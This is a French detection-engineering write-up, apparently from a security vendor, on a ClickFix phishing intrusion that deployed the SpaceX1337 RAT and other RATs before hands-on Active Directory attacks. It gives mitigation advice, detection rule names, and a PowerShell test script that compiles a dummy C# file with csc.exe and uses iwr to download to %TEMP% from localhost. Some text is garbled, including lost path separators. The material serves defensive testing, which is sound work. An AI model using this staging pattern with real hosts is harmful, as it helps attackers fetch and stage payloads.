SpaceX1337 ClickFix entraîne un compromis AD manuel
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un adversaire a utilisé un leurre de phishing ClickFix pour déployer le RAT SpaceX1337, suivi d’une infection en plusieurs étapes impliquant des RAT de commodité tels que NetSupport, AsyncRAT et Remus. L’intrusion est passée d’un vol d’identifiants automatisé à une activité interactive sur clavier ciblant Active Directory. L’attaquant a finalement tenté un mouvement latéral vers un contrôleur de domaine et un bourrage d’identifiants contre un portail VPN.
Enquête
L’intrusion a été capturée dans un honeynet Active Directory entièrement instrumenté, offrant une visibilité de bout en bout grâce à la télémétrie EDR, Zeek et Suricata. Les chercheurs ont tracé l’activité du premier téléchargeur PowerShell à travers une reconnaissance étendue ADSI/LDAP et un mouvement latéral sur SMB. L’enquête a clairement identifié la transition de l’exécution automatisée de logiciels malveillants à l’interaction directe par un opérateur humain.
Atténuation
Les organisations doivent appliquer des contrôles stricts sur l’exécution de PowerShell et surveiller les relations suspectes parent-enfant des processus, y compris explorer.exe engendrant PowerShell. Les équipes de sécurité doivent détecter la compilation sur hôte via csc.exe et l’utilisation abusive des LOLBins tels que certutil or bitsadmin pour les téléchargements externes. Active Directory doit également être renforcé en supprimant les données sensibles des attributs LDAP et en surveillant les requêtes LDAP anormales.
Réponse
Si une activité suspecte est détectée, les répondants aux incidents doivent isoler les points de terminaison concernés et révoquer les identifiants de compte de service et d’administrateur de domaine potentiellement compromis. Les enquêtes doivent prioriser l’identification de plusieurs familles de RAT et vérifier les tâches planifiées non autorisées ou les modifications du registre. Les journaux VPN doivent également être examinés pour les tentatives de bourrage d’identifiants provenant d’une infrastructure malveillante connue.
Flux du005cu0027attaque
Détections
Exécution Python depuis des dossiers suspects (via cmdline)
Entrée RunMRU suspecte avec sémantique LOLBin (via registry_event)
Exécution de commande sur un hôte distant à l’aide de la gestion à distance Windows (via cmdline)
Possibilité d’énumération ou de manipulation de comptes ou de groupes (via cmdline)
Découverte suspecte de confiance des domaines (via cmdline)
Possibilité de découverte de la configuration réseau du système (via cmdline)
Exécutable suspect ne contenant que des chiffres dans le nom (via cmdline)
LOLBAS Schtasks (via cmdline)
Utilisation de Certutil pour le codage de données et les opérations de certificat (via cmdline)
LOLBAS Bitsadmin (via cmdline)
Possibilité de vidage SAM/SYSTEM/SECURITY (via cmdline)
Appel de méthodes .NET suspectes depuis Powershell (via powershell)
Communication de domaine Trycloudflare suspecte (via dns)
Tentative de communication de recherche d’IP possible (via dns)
IOCs (HashSha256) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct
IOCs (HashMd5) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct
IOCs (SourceIP) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct
IOCs (DestinationIP) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct
Règle Sigma haute fidélité pour communication SpaceX1337 et AdaptixC2 [Connexion réseau Windows]
Détection de compilation de beacon AdaptixC2 et de chargeur PowerShell [Création de processus Windows]
Exécution de simulation
Prérequis : La vérification préalable de la télémétrie et de la base de référence doit être réussie.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) destinée à déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à des erreurs de diagnostic.
-
Récit d’attaque et commandes : Un adversaire a obtenu un accès initial via un lien de phishing. Pour éviter de déposer un
.exemalveillant connu sur le disque, ils déposent un petit.csfichier source. Ils invoquent ensuitecsc.exepour compiler cette source en un exécutable Windows fonctionnel (svc.exe) situé dans le répertoire%TEMP%. Immédiatement après la compilation, l’attaquant utilise PowerShell pour récupérer un chargeur de deuxième étape depuis un serveur C2 distant (simulé via un auditeur local) en utilisant l’aliasiwr(Invoke-WebRequest), l’enregistrant dans le dossier temporaire pour compléter le processus de mise en scène. -
Script de test de régression :
# 1. Créer un fichier source C# fictif pour simuler la source AdaptixC2 $csFile = "$env:TEMPsvc.cs" $exeFile = "$env:TEMPsvc.exe" $sourceCode = @" using System; namespace MimicC2 { class Program { static void Main() { Console.WriteLine("Simulated Beacon"); } } } "@ $sourceCode | Out-File -FilePath $csFile -Encoding ascii # 2. Simuler la compilation csc.exe (Déclenche selection_csc) # Note : Nous utilisons les mêmes drapeaux que ceux spécifiés dans la logique de détection Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait # 3. Simuler le téléchargement PowerShell (Déclenche selection_powershell) # Nous utilisons 'iwr' et le chemin OutFile spécifique pour correspondre à la logique # En utilisant une URL inexistante pour éviter le trafic réseau réel, mais la ligne de commande correspondra powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`"" -
Commandes de nettoyage :
Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue